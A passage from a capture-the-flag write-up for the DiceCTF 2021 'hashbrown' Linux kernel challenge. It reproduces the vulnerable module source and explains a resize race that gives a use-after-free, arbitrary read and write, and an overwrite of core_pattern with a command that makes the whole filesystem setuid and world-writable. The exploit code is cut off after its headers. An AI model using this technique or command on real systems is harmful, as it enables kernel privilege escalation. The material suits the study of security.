i++) { if (hashmap.buckets[i]) { traverse = hashmap.buckets[i]; while (traverse) { temp = traverse; traverse = traverse-&gt;next; kfree(temp); } hashmap.buckets[i] = NULL; } } kfree(hashmap.buckets); hashmap.buckets = NULL; return; } static long resize(request_t *arg) { hash_entry **new_buckets, *temp_entry, *temp; request_t request; char *temp_data; uint32_t new_size, new_threshold, new_idx; int i, duplicate; if (copy_from_user((void *)&amp;request, (void *)arg, sizeof(request_t))) { return INVALID; } if (request.size &lt; 1 || request.size &gt; MAX_VALUE_SIZE) { return INVALID; } new_size = hashmap.size * 2; new_threshold = GET_THRESHOLD(new_size); new_buckets = kzalloc(sizeof(hash_entry *) * new_size, GFP_KERNEL); if (!new_buckets) { return INVALID; } duplicate = 0; for (i = 0; i &lt; hashmap.size; i++) { if (hashmap.buckets[i]) { for (temp_entry = hashmap.buckets[i]; temp_entry != NULL; temp_entry = temp_entry-&gt;next) { if (temp_entry-&gt;key == request.key) { duplicate = 1; } new_idx = get_hash_idx(temp_entry-&gt;key, new_size); temp = kzalloc(sizeof(hash_entry), GFP_KERNEL); if (!temp) { kfree(new_buckets); return INVALID; } temp-&gt;key = temp_entry-&gt;key; temp-&gt;size = temp_entry-&gt;size; temp-&gt;value = temp_entry-&gt;value; resize_add(new_idx, temp, new_buckets); } } } if (!duplicate) { new_idx = get_hash_idx(request.key, new_size); temp = kzalloc(sizeof(hash_entry), GFP_KERNEL); if (!temp) { kfree(new_buckets); return INVALID; } temp_data = kzalloc(request.size, GFP_KERNEL); if (!temp_data) { kfree(temp); kfree(new_buckets); return INVALID; } if (copy_from_user(temp_data, request.src, request.size)) { kfree(temp_data); kfree(temp); kfree(new_buckets); return INVALID; } temp-&gt;size = request.size; temp-&gt;value = temp_data; temp-&gt;key = request.key; temp-&gt;next = NULL; resize_add(new_idx, temp, new_buckets); hashmap.entry_count++; } resize_clean_old(); hashmap.size = new_size; hashmap.threshold = new_threshold; hashmap.buckets = new_buckets; return (duplicate) ? EXISTS : 0; } static long add_key(uint32_t idx, uint32_t key, uint32_t size, char *src) { hash_entry *temp_entry, *temp; char *temp_data; if (size &lt; 1 || size &gt; MAX_VALUE_SIZE) { return INVALID; } temp_entry = kzalloc(sizeof(hash_entry), GFP_KERNEL); temp_data = kzalloc(size, GFP_KERNEL); if (!temp_entry || !temp_data) { return INVALID; } if (copy_from_user(temp_data, src, size)) { return INVALID; } temp_entry-&gt;key = key; temp_entry-&gt;size = size; temp_entry-&gt;value = temp_data; temp_entry-&gt;next = NULL; if (!hashmap.buckets[idx]) { hashmap.buckets[idx] = temp_entry; hashmap.entry_count++; return 0; } else { for (temp = hashmap.buckets[idx]; temp-&gt;next != NULL; temp = temp-&gt;next) { if (temp-&gt;key == key) { kfree(temp_data); kfree(temp_entry); return EXISTS; } } if (temp-&gt;key == key) { kfree(temp_data); kfree(temp_entry); return EXISTS; } temp-&gt;next = temp_entry; hashmap.entry_count++; return 0; } } static long delete_key(uint32_t idx, uint32_t key) { hash_entry *temp, *prev; if (!hashmap.buckets[idx]) { return NOT_EXISTS; } if (hashmap.buckets[idx]-&gt;key == key) { temp = hashmap.buckets[idx]-&gt;next; if (hashmap.buckets[idx]-&gt;value) { kfree(hashmap.buckets[idx]-&gt;value); } kfree(hashmap.buckets[idx]); hashmap.buckets[idx] = temp; hashmap.entry_count--; return 0; } temp = hashmap.buckets[idx]; while (temp != NULL &amp;&amp; temp-&gt;key != key) { prev = temp; temp = temp-&gt;next; } if (temp == NULL) { return NOT_EXISTS; } prev-&gt;next = temp-&gt;next; if (temp-&gt;value) { kfree(temp-&gt;value); } kfree(temp); hashmap.entry_count--; return 0; } static long update_value(uint32_t idx, uint32_t key, uint32_t size, char *src) { hash_entry *temp; char *temp_data; if (size &lt; 1 || size &gt; MAX_VALUE_SIZE) { return INVALID; } if (!hashmap.buckets[idx]) { return NOT_EXISTS; } for (temp = hashmap.buckets[idx]; temp != NULL; temp = temp-&gt;next) { if (temp-&gt;key == key) { if (temp-&gt;size != size) { if (temp-&gt;value) { kfree(temp-&gt;value); } temp-&gt;value = NULL; temp-&gt;size = 0; temp_data = kzalloc(size, GFP_KERNEL); if (!temp_data || copy_from_user(temp_data, src, size)) { return INVALID; } temp-&gt;size = size; temp-&gt;value = temp_data; } else { if (copy_from_user(temp-&gt;value, src, size)) { return INVALID; } } return 0; } } return NOT_EXISTS; } static long delete_value(uint32_t idx, uint32_t key) { hash_entry *temp; if (!hashmap.buckets[idx]) { return NOT_EXISTS; } for (temp = hashmap.buckets[idx]; temp != NULL; temp = temp-&gt;next) { if (temp-&gt;key == key) { if (!temp-&gt;value || !temp-&gt;size) { return NOT_EXISTS; } kfree(temp-&gt;value); temp-&gt;value = NULL; temp-&gt;size = 0; return 0; } } return NOT_EXISTS; } static long get_value(uint32_t idx, uint32_t key, uint32_t size, char *dest) { hash_entry *temp; if (!hashmap.buckets[idx]) { return NOT_EXISTS; } for (temp = hashmap.buckets[idx]; temp != NULL; temp = temp-&gt;next) { if (temp-&gt;key == key) { if (!temp-&gt;value || !temp-&gt;size) { return NOT_EXISTS; } if (size &gt; temp-&gt;size) { return INVALID; } if (copy_to_user(dest, temp-&gt;value, size)) { return INVALID; } return 0; } } return NOT_EXISTS; } #pragma GCC pop_options static int __init init_hashbrown(void) { major = register_chrdev(0, DEVICE_NAME, &amp;hashbrown_fops); if (major &lt; 0) { return -1; } hashbrown_class = class_create(THIS_MODULE, CLASS_NAME); if (IS_ERR(hashbrown_class)) { unregister_chrdev(major, DEVICE_NAME); return -1; } hashbrown_device = device_create(hashbrown_class, 0, MKDEV(major, 0), 0, DEVICE_NAME); if (IS_ERR(hashbrown_device)) { class_destroy(hashbrown_class); unregister_chrdev(major, DEVICE_NAME); return -1; } mutex_init(&amp;operations_lock); mutex_init(&amp;resize_lock); hashmap.size = SIZE_ARR_START; hashmap.entry_count = 0; hashmap.threshold = GET_THRESHOLD(hashmap.size); hashmap.buckets = kzalloc(sizeof(hash_entry *) * hashmap.size, GFP_KERNEL); printk(KERN_INFO &#34;HashBrown Loaded! Who doesn&#39;t love Hashbrowns!\n&#34;); return 0; } static void __exit exit_hashbrown(void) { device_destroy(hashbrown_class, MKDEV(major, 0)); class_unregister(hashbrown_class); class_destroy(hashbrown_class); unregister_chrdev(major, DEVICE_NAME); mutex_destroy(&amp;operations_lock); mutex_destroy(&amp;resize_lock); printk(KERN_INFO &#34;HashBrown Unloaded\n&#34;); } module_init(init_hashbrown); module_exit(exit_hashbrown);</code></pre></div> <p>This module allow us to add, delete and update key and value to hashmap.</p> <hr> <h2 id="problem">Problem</h2> <h3 id="environment">Environment</h3> <ul> <li>linux version: <a href="https://elixir.bootlin.com/linux/v5.11-rc3/source"><code>5.11.0-rc3</code></a> <ul> <li>CONFIG_SLAB_FREELIST_RANDOM=y</li> <li>CONFIG_SLAB=y</li> <li>CONFIG_FG_KASLR=y</li> </ul> </li> <li>unprivileged_userfaultfd: 1</li> <li>unprivileged_bpf_disabled: 0</li> </ul> <h3 id="module">Module</h3> <div class="collapsable-code"> <input id="381792654" type="checkbox" checked /> <label for="381792654"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">DiceCTF2021-hashbrown-module.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;linux/device.h&gt; #include &lt;linux/fs.h&gt; #include &lt;linux/kernel.h&gt; #include &lt;linux/module.h&gt; #include &lt;linux/mutex.h&gt; #include &lt;linux/slab.h&gt; #include &lt;linux/uaccess.h&gt; #define DEVICE_NAME &#34;hashbrown&#34; #define CLASS_NAME &#34;hashbrown&#34; MODULE_AUTHOR(&#34;FizzBuzz101&#34;); MODULE_DESCRIPTION(&#34;Here&#39;s a hashbrown for everyone!&#34;); MODULE_LICENSE(&#34;GPL&#34;); #define ADD_KEY 0x1337 #define DELETE_KEY 0x1338 #define UPDATE_VALUE 0x1339 #define DELETE_VALUE 0x133a #define GET_VALUE 0x133b #define SIZE_ARR_START 0x10 #define SIZE_ARR_MAX 0x200 #define MAX_ENTRIES 0x400 #define MAX_VALUE_SIZE 0xb0 #define GET_THRESHOLD(size) size - (size &gt;&gt; 2) #define INVALID 1 #define EXISTS 2 #define NOT_EXISTS 3 #define MAXED 4 static DEFINE_MUTEX(operations_lock); static DEFINE_MUTEX(resize_lock); static long hashmap_ioctl(struct file *file, unsigned int cmd, unsigned long arg); static int major; static struct class *hashbrown_class = NULL; static struct device *hashbrown_device = NULL; static struct file_operations hashbrown_fops = {.unlocked_ioctl = hashmap_ioctl}; typedef struct { uint32_t key; uint32_t size; char *src; char *dest; } request_t; struct hash_entry { uint32_t key; uint32_t size; char *value; struct hash_entry *next; }; typedef struct hash_entry hash_entry; typedef struct { uint32_t size; uint32_t threshold; uint32_t entry_count; hash_entry **buckets; } hashmap_t; hashmap_t hashmap; static noinline uint32_t get_hash_idx(uint32_t key, uint32_t size); static noinline long resize(request_t *arg); static noinline void resize_add(uint32_t idx, hash_entry *entry, hash_entry **new_buckets); static noinline void resize_clean_old(void); static noinline long add_key(uint32_t idx, uint32_t key, uint32_t size, char *src); static noinline long delete_key(uint32_t idx, uint32_t key); static noinline long update_value(uint32_t idx, uint32_t key, uint32_t size, char *src); static noinline long delete_value(uint32_t idx, uint32_t key); static noinline long get_value(uint32_t idx, uint32_t key, uint32_t size, char *dest); #pragma GCC push_options #pragma GCC optimize(&#34;O1&#34;) static long hashmap_ioctl(struct file *file, unsigned int cmd, unsigned long arg) { long result; request_t request; uint32_t idx; if (cmd == ADD_KEY) { if (hashmap.entry_count == hashmap.threshold &amp;&amp; hashmap.size &lt; SIZE_ARR_MAX) { mutex_lock(&amp;resize_lock); result = resize((request_t *)arg); mutex_unlock(&amp;resize_lock); return result; } } mutex_lock(&amp;operations_lock); if (copy_from_user((void *)&amp;request, (void *)arg, sizeof(request_t))) { result = INVALID; } else if (cmd == ADD_KEY &amp;&amp; hashmap.entry_count == MAX_ENTRIES) { result = MAXED; } else { idx = get_hash_idx(request.key, hashmap.size); switch (cmd) { case ADD_KEY: result = add_key(idx, request.key, request.size, request.src); break; case DELETE_KEY: result = delete_key(idx, request.key); break; case UPDATE_VALUE: result = update_value(idx, request.key, request.size, request.src); break; case DELETE_VALUE: result = delete_value(idx, request.key); break; case GET_VALUE: result = get_value(idx, request.key, request.size, request.dest); break; default: result = INVALID; break; } } mutex_unlock(&amp;operations_lock); return result; } static uint32_t get_hash_idx(uint32_t key, uint32_t size) { uint32_t hash; key ^= (key &gt;&gt; 20) ^ (key &gt;&gt; 12); hash = key ^ (key &gt;&gt; 7) ^ (key &gt;&gt; 4); return hash &amp; (size - 1); } static noinline void resize_add(uint32_t idx, hash_entry *entry, hash_entry **new_buckets) { if (!new_buckets[idx]) { new_buckets[idx] = entry; } else { entry-&gt;next = new_buckets[idx]; new_buckets[idx] = entry; } } static noinline void resize_clean_old() { int i; hash_entry *traverse, *temp; for (i = 0; i &lt; hashmap.size; i++) { if (hashmap.buckets[i]) { traverse = hashmap.buckets[i]; while (traverse) { temp = traverse; traverse = traverse-&gt;next; kfree(temp); } hashmap.buckets[i] = NULL; } } kfree(hashmap.buckets); hashmap.buckets = NULL; return; } static long resize(request_t *arg) { hash_entry **new_buckets, *temp_entry, *temp; request_t request; char *temp_data; uint32_t new_size, new_threshold, new_idx; int i, duplicate; if (copy_from_user((void *)&amp;request, (void *)arg, sizeof(request_t))) { return INVALID; } if (request.size &lt; 1 || request.size &gt; MAX_VALUE_SIZE) { return INVALID; } new_size = hashmap.size * 2; new_threshold = GET_THRESHOLD(new_size); new_buckets = kzalloc(sizeof(hash_entry *) * new_size, GFP_KERNEL); if (!new_buckets) { return INVALID; } duplicate = 0; for (i = 0; i &lt; hashmap.size; i++) { if (hashmap.buckets[i]) { for (temp_entry = hashmap.buckets[i]; temp_entry != NULL; temp_entry = temp_entry-&gt;next) { if (temp_entry-&gt;key == request.key) { duplicate = 1; } new_idx = get_hash_idx(temp_entry-&gt;key, new_size); temp = kzalloc(sizeof(hash_entry), GFP_KERNEL); if (!temp) { kfree(new_buckets); return INVALID; } temp-&gt;key = temp_entry-&gt;key; temp-&gt;size = temp_entry-&gt;size; temp-&gt;value = temp_entry-&gt;value; resize_add(new_idx, temp, new_buckets); } } } if (!duplicate) { new_idx = get_hash_idx(request.key, new_size); temp = kzalloc(sizeof(hash_entry), GFP_KERNEL); if (!temp) { kfree(new_buckets); return INVALID; } temp_data = kzalloc(request.size, GFP_KERNEL); if (!temp_data) { kfree(temp); kfree(new_buckets); return INVALID; } if (copy_from_user(temp_data, request.src, request.size)) { kfree(temp_data); kfree(temp); kfree(new_buckets); return INVALID; } temp-&gt;size = request.size; temp-&gt;value = temp_data; temp-&gt;key = request.key; temp-&gt;next = NULL; resize_add(new_idx, temp, new_buckets); hashmap.entry_count++; } resize_clean_old(); hashmap.size = new_size; hashmap.threshold = new_threshold; hashmap.buckets = new_buckets; return (duplicate) ? EXISTS : 0; } static long add_key(uint32_t idx, uint32_t key, uint32_t size, char *src) { hash_entry *temp_entry, *temp; char *temp_data; if (size &lt; 1 || size &gt; MAX_VALUE_SIZE) { return INVALID; } temp_entry = kzalloc(sizeof(hash_entry), GFP_KERNEL); temp_data = kzalloc(size, GFP_KERNEL); if (!temp_entry || !temp_data) { return INVALID; } if (copy_from_user(temp_data, src, size)) { return INVALID; } temp_entry-&gt;key = key; temp_entry-&gt;size = size; temp_entry-&gt;value = temp_data; temp_entry-&gt;next = NULL; if (!hashmap.buckets[idx]) { hashmap.buckets[idx] = temp_entry; hashmap.entry_count++; return 0; } else { for (temp = hashmap.buckets[idx]; temp-&gt;next != NULL; temp = temp-&gt;next) { if (temp-&gt;key == key) { kfree(temp_data); kfree(temp_entry); return EXISTS; } } if (temp-&gt;key == key) { kfree(temp_data); kfree(temp_entry); return EXISTS; } temp-&gt;next = temp_entry; hashmap.entry_count++; return 0; } } static long delete_key(uint32_t idx, uint32_t key) { hash_entry *temp, *prev; if (!hashmap.buckets[idx]) { return NOT_EXISTS; } if (hashmap.buckets[idx]-&gt;key == key) { temp = hashmap.buckets[idx]-&gt;next; if (hashmap.buckets[idx]-&gt;value) { kfree(hashmap.buckets[idx]-&gt;value); } kfree(hashmap.buckets[idx]); hashmap.buckets[idx] = temp; hashmap.entry_count--; return 0; } temp = hashmap.buckets[idx]; while (temp != NULL &amp;&amp; temp-&gt;key != key) { prev = temp; temp = temp-&gt;next; } if (temp == NULL) { return NOT_EXISTS; } prev-&gt;next = temp-&gt;next; if (temp-&gt;value) { kfree(temp-&gt;value); } kfree(temp); hashmap.entry_count--; return 0; } static long update_value(uint32_t idx, uint32_t key, uint32_t size, char *src) { hash_entry *temp; char *temp_data; if (size &lt; 1 || size &gt; MAX_VALUE_SIZE) { return INVALID; } if (!hashmap.buckets[idx]) { return NOT_EXISTS; } for (temp = hashmap.buckets[idx]; temp != NULL; temp = temp-&gt;next) { if (temp-&gt;key == key) { if (temp-&gt;size != size) { if (temp-&gt;value) { kfree(temp-&gt;value); } temp-&gt;value = NULL; temp-&gt;size = 0; temp_data = kzalloc(size, GFP_KERNEL); if (!temp_data || copy_from_user(temp_data, src, size)) { return INVALID; } temp-&gt;size = size; temp-&gt;value = temp_data; } else { if (copy_from_user(temp-&gt;value, src, size)) { return INVALID; } } return 0; } } return NOT_EXISTS; } static long delete_value(uint32_t idx, uint32_t key) { hash_entry *temp; if (!hashmap.buckets[idx]) { return NOT_EXISTS; } for (temp = hashmap.buckets[idx]; temp != NULL; temp = temp-&gt;next) { if (temp-&gt;key == key) { if (!temp-&gt;value || !temp-&gt;size) { return NOT_EXISTS; } kfree(temp-&gt;value); temp-&gt;value = NULL; temp-&gt;size = 0; return 0; } } return NOT_EXISTS; } static long get_value(uint32_t idx, uint32_t key, uint32_t size, char *dest) { hash_entry *temp; if (!hashmap.buckets[idx]) { return NOT_EXISTS; } for (temp = hashmap.buckets[idx]; temp != NULL; temp = temp-&gt;next) { if (temp-&gt;key == key) { if (!temp-&gt;value || !temp-&gt;size) { return NOT_EXISTS; } if (size &gt; temp-&gt;size) { return INVALID; } if (copy_to_user(dest, temp-&gt;value, size)) { return INVALID; } return 0; } } return NOT_EXISTS; } #pragma GCC pop_options static int __init init_hashbrown(void) { major = register_chrdev(0, DEVICE_NAME, &amp;hashbrown_fops); if (major &lt; 0) { return -1; } hashbrown_class = class_create(THIS_MODULE, CLASS_NAME); if (IS_ERR(hashbrown_class)) { unregister_chrdev(major, DEVICE_NAME); return -1; } hashbrown_device = device_create(hashbrown_class, 0, MKDEV(major, 0), 0, DEVICE_NAME); if (IS_ERR(hashbrown_device)) { class_destroy(hashbrown_class); unregister_chrdev(major, DEVICE_NAME); return -1; } mutex_init(&amp;operations_lock); mutex_init(&amp;resize_lock); hashmap.size = SIZE_ARR_START; hashmap.entry_count = 0; hashmap.threshold = GET_THRESHOLD(hashmap.size); hashmap.buckets = kzalloc(sizeof(hash_entry *) * hashmap.size, GFP_KERNEL); printk(KERN_INFO &#34;HashBrown Loaded! Who doesn&#39;t love Hashbrowns!\n&#34;); return 0; } static void __exit exit_hashbrown(void) { device_destroy(hashbrown_class, MKDEV(major, 0)); class_unregister(hashbrown_class); class_destroy(hashbrown_class); unregister_chrdev(major, DEVICE_NAME); mutex_destroy(&amp;operations_lock); mutex_destroy(&amp;resize_lock); printk(KERN_INFO &#34;HashBrown Unloaded\n&#34;); } module_init(init_hashbrown); module_exit(exit_hashbrown);</code></pre></div> <p>This module allow us to add, delete and update key and value to hashmap.</p> <h3 id="vulnerability">Vulnerability</h3> <p>The vulnerability is easy, a race condition can be occurs in <code>hashmap_ioctl</code> function:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">static</span> <span style="color:#66d9ef">long</span> <span style="color:#a6e22e">hashmap_ioctl</span>(<span style="color:#66d9ef">struct</span> file <span style="color:#f92672">*</span>file, <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> cmd, </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">long</span> arg) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">long</span> result; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">request_t</span> request; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint32_t</span> idx; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">==</span> ADD_KEY) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (hashmap.entry_count <span style="color:#f92672">==</span> hashmap.threshold <span style="color:#f92672">&amp;&amp;</span> </span></span><span style="display:flex;"><span> hashmap.size <span style="color:#f92672">&lt;</span> SIZE_ARR_MAX) { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">mutex_lock</span>(<span style="color:#f92672">&amp;</span>resize_lock); </span></span><span style="display:flex;"><span> result <span style="color:#f92672">=</span> <span style="color:#a6e22e">resize</span>((<span style="color:#66d9ef">request_t</span> <span style="color:#f92672">*</span>)arg); </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">mutex_unlock</span>(<span style="color:#f92672">&amp;</span>resize_lock); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> result; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">mutex_lock</span>(<span style="color:#f92672">&amp;</span>operations_lock); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">copy_from_user</span>((<span style="color:#66d9ef">void</span> <span style="color:#f92672">*</span>)<span style="color:#f92672">&amp;</span>request, (<span style="color:#66d9ef">void</span> <span style="color:#f92672">*</span>)arg, <span style="color:#66d9ef">sizeof</span>(<span style="color:#66d9ef">request_t</span>))) { </span></span><span style="display:flex;"><span> result <span style="color:#f92672">=</span> INVALID; </span></span><span style="display:flex;"><span> } <span style="color:#66d9ef">else</span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">==</span> ADD_KEY <span style="color:#f92672">&amp;&amp;</span> hashmap.entry_count <span style="color:#f92672">==</span> MAX_ENTRIES) { </span></span><span style="display:flex;"><span> result <span style="color:#f92672">=</span> MAXED; </span></span><span style="display:flex;"><span> } <span style="color:#66d9ef">else</span> { </span></span><span style="display:flex;"><span> idx <span style="color:#f92672">=</span> <span style="color:#a6e22e">get_hash_idx</span>(request.key, hashmap.size); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">switch</span> (cmd) { </span></span><span style="display:flex;"><span> <span style="color:#75715e">// ... </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> } </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">mutex_unlock</span>(<span style="color:#f92672">&amp;</span>operations_lock); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> result; </span></span><span style="display:flex;"><span>} </span></span></code></pre></div><p>As we can see, we can trigger <code>resize</code> function and other modification functions. And in <code>resize</code> function, there is a entry-copy mechanism which allocate new heap chunk and copy old entry&rsquo;s data to new one. After copying, delete old hashmap&rsquo;s bucket using <code>resize_clean_old</code> and set hashmap&rsquo;s bucket to new one:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">static</span> <span style="color:#66d9ef">long</span> <span style="color:#a6e22e">resize</span>(<span style="color:#66d9ef">request_t</span> <span style="color:#f92672">*</span>arg) { </span></span><span style="display:flex;"><span> hash_entry <span style="color:#f92672">**</span>new_buckets, <span style="color:#f92672">*</span>temp_entry, <span style="color:#f92672">*</span>temp; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">request_t</span> request; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">char</span> <span style="color:#f92672">*</span>temp_data; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint32_t</span> new_size, new_threshold, new_idx; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">int</span> i, duplicate; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#75715e">// ... </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> </span></span><span style="display:flex;"><span> duplicate <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">for</span> (i <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; i <span style="color:#f92672">&lt;</span> hashmap.size; i<span style="color:#f92672">++</span>) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (hashmap.buckets[i]) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">for</span> (temp_entry <span style="color:#f92672">=</span> hashmap.buckets[i]; temp_entry <span style="color:#f92672">!=</span> NULL; </span></span><span style="display:flex;"><span> temp_entry <span style="color:#f92672">=</span> temp_entry<span style="color:#f92672">-&gt;</span>next) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (temp_entry<span style="color:#f92672">-&gt;</span>key <span style="color:#f92672">==</span> request.key) { </span></span><span style="display:flex;"><span> duplicate <span style="color:#f92672">=</span> <span style="color:#ae81ff">1</span>; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> new_idx <span style="color:#f92672">=</span> <span style="color:#a6e22e">get_hash_idx</span>(temp_entry<span style="color:#f92672">-&gt;</span>key, new_size); </span></span><span style="display:flex;"><span> temp <span style="color:#f92672">=</span> <span style="color:#a6e22e">kzalloc</span>(<span style="color:#66d9ef">sizeof</span>(hash_entry), GFP_KERNEL); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>temp) { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">kfree</span>(new_buckets); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> INVALID; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> temp<span style="color:#f92672">-&gt;</span>key <span style="color:#f92672">=</span> temp_entry<span style="color:#f92672">-&gt;</span>key; </span></span><span style="display:flex;"><span> temp<span style="color:#f92672">-&gt;</span>size <span style="color:#f92672">=</span> temp_entry<span style="color:#f92672">-&gt;</span>size; </span></span><span style="display:flex;"><span> temp<span style="color:#f92672">-&gt;</span>value <span style="color:#f92672">=</span> temp_entry<span style="color:#f92672">-&gt;</span>value; </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">resize_add</span>(new_idx, temp, new_buckets); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>duplicate) { </span></span><span style="display:flex;"><span> new_idx <span style="color:#f92672">=</span> <span style="color:#a6e22e">get_hash_idx</span>(request.key, new_size); </span></span><span style="display:flex;"><span> temp <span style="color:#f92672">=</span> <span style="color:#a6e22e">kzalloc</span>(<span style="color:#66d9ef">sizeof</span>(hash_entry), GFP_KERNEL); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>temp) { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">kfree</span>(new_buckets); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> INVALID; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> temp_data <span style="color:#f92672">=</span> <span style="color:#a6e22e">kzalloc</span>(request.size, GFP_KERNEL); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>temp_data) { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">kfree</span>(temp); </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">kfree</span>(new_buckets); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> INVALID; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">copy_from_user</span>(temp_data, request.src, request.size)) { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">kfree</span>(temp_data); </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">kfree</span>(temp); </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">kfree</span>(new_buckets); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> INVALID; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> temp<span style="color:#f92672">-&gt;</span>size <span style="color:#f92672">=</span> request.size; </span></span><span style="display:flex;"><span> temp<span style="color:#f92672">-&gt;</span>value <span style="color:#f92672">=</span> temp_data; </span></span><span style="display:flex;"><span> temp<span style="color:#f92672">-&gt;</span>key <span style="color:#f92672">=</span> request.key; </span></span><span style="display:flex;"><span> temp<span style="color:#f92672">-&gt;</span>next <span style="color:#f92672">=</span> NULL; </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">resize_add</span>(new_idx, temp, new_buckets); </span></span><span style="display:flex;"><span> hashmap.entry_count<span style="color:#f92672">++</span>; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">resize_clean_old</span>(); </span></span><span style="display:flex;"><span> hashmap.size <span style="color:#f92672">=</span> new_size; </span></span><span style="display:flex;"><span> hashmap.threshold <span style="color:#f92672">=</span> new_threshold; </span></span><span style="display:flex;"><span> hashmap.buckets <span style="color:#f92672">=</span> new_buckets; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> (duplicate) <span style="color:#f92672">?</span> EXISTS : <span style="color:#ae81ff">0</span>; </span></span><span style="display:flex;"><span>} </span></span></code></pre></div><h2 id="exploit">Exploit</h2> <h3 id="make-uaf-and-get-controlled-entry">Make UAF and get controlled entry</h3> <p>So, if we delete the value after copying and before <code>resize_clean_old</code>, there will be freed value in new bucket. Since size of <code>hash_entry</code> is 0x20, we can get controll to entry with freed value in new bucket (see <code>construct_corrupted_entry</code>).</p> <h3 id="aaraaw">AAR/AAW</h3> <p>In <code>hash_entry</code>, <code>size</code> and <code>value</code> member exist. So we can make AAR and AAW primitives using them (see <code>aar</code> and <code>aaw</code>).</p> <h3 id="find-core_pattern-and-overwrite-it">Find core_pattern and overwrite it</h3> <p>Although we can read and write at arbitrary address, there is a limit to do reading because of <a href="https://elixir.bootlin.com/linux/v5.11-rc3/source/mm/usercopy.c#L256"><code>__check_object_size</code></a>. But, I can leak some address in kernel area (see <code>find_kernel_address</code>). And using it, I can find kernel base (see <code>find_core_pattern_address</code> and the few lines after calling it).</p> <p>Then since we can read and write at arbitrary address and we know the <code>core_pattern</code> address, overwrite <code>core_pattern</code> with &ldquo;|/bin/chmod 6777 -R /&rdquo;.</p> <h3 id="exploit-code">Exploit code</h3> <div class="collapsable-code"> <input id="549712386" type="checkbox" checked /> <label for="549712386"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">DiceCTF2021-hashbrown-exploit.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#define _GNU_SOURCE #include &lt;fcntl.h&gt; #include &lt;linux/userfaultfd.h&gt; #include &lt;poll.h&gt; #include &lt;pthread.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/mman.h&gt; #include &lt;sys/prctl.h&gt; #include 